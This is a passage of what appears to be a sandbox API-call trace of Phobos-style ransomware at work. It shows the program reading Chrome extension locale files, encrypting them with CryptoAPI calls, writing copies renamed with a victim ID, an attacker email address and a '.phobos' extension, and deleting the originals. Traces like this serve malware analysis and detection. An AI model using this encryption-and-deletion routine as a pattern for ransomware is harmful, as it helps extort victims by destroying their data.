hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0154.814] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.814] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.814] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.814] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.814] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.814] CloseHandle (hObject=0x138) returned 1 [0154.814] CloseHandle (hObject=0x194) returned 1 [0154.814] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json")) returned 1 [0154.815] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.816] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=327) returned 1 [0154.816] CloseHandle (hObject=0x194) returned 1 [0154.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json")) returned 0x2020 [0154.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.816] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.816] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.817] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.817] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.817] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x147, lpOverlapped=0x0) returned 1 [0154.817] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150, dwBufLen=0x150 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150) returned 1 [0154.817] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x150, lpOverlapped=0x0) returned 1 [0154.818] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0154.818] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.818] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.818] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.818] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.818] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.818] CloseHandle (hObject=0x194) returned 1 [0154.818] CloseHandle (hObject=0x138) returned 1 [0154.819] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\kn\\messages.json")) returned 1 [0154.819] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.820] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=217) returned 1 [0154.820] CloseHandle (hObject=0x138) returned 1 [0154.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json")) returned 0x2020 [0154.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.820] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.820] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.820] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.821] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.821] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd9, lpOverlapped=0x0) returned 1 [0154.821] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0154.821] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0154.822] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0154.822] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.822] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.822] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.822] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.822] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.822] CloseHandle (hObject=0x138) returned 1 [0154.822] CloseHandle (hObject=0x194) returned 1 [0154.823] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json")) returned 1 [0154.823] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.824] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=450) returned 1 [0154.824] CloseHandle (hObject=0x194) returned 1 [0154.824] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json")) returned 0x2020 [0154.824] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.824] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.824] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.825] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.825] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.825] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1c2, lpOverlapped=0x0) returned 1 [0154.830] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1d0) returned 1 [0154.830] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1d0, lpOverlapped=0x0) returned 1 [0154.831] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0154.831] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.831] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.831] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.831] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.831] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.831] CloseHandle (hObject=0x194) returned 1 [0154.831] CloseHandle (hObject=0x138) returned 1 [0154.831] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\messages.json")) returned 1 [0154.832] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.833] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=213) returned 1 [0154.833] CloseHandle (hObject=0x138) returned 1 [0154.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json")) returned 0x2020 [0154.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0154.833] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.833] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0154.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0154.833] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0154.833] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.833] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd5, lpOverlapped=0x0) returned 1 [0154.835] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0154.835] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0154.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0154.836] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0154.836] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0154.836] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.836] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0154.836] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.836] CloseHandle (hObject=0x138) returned 1 [0154.836] CloseHandle (hObject=0x194) returned 1 [0154.836] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json")) returned 1 [0154.837] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0154.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 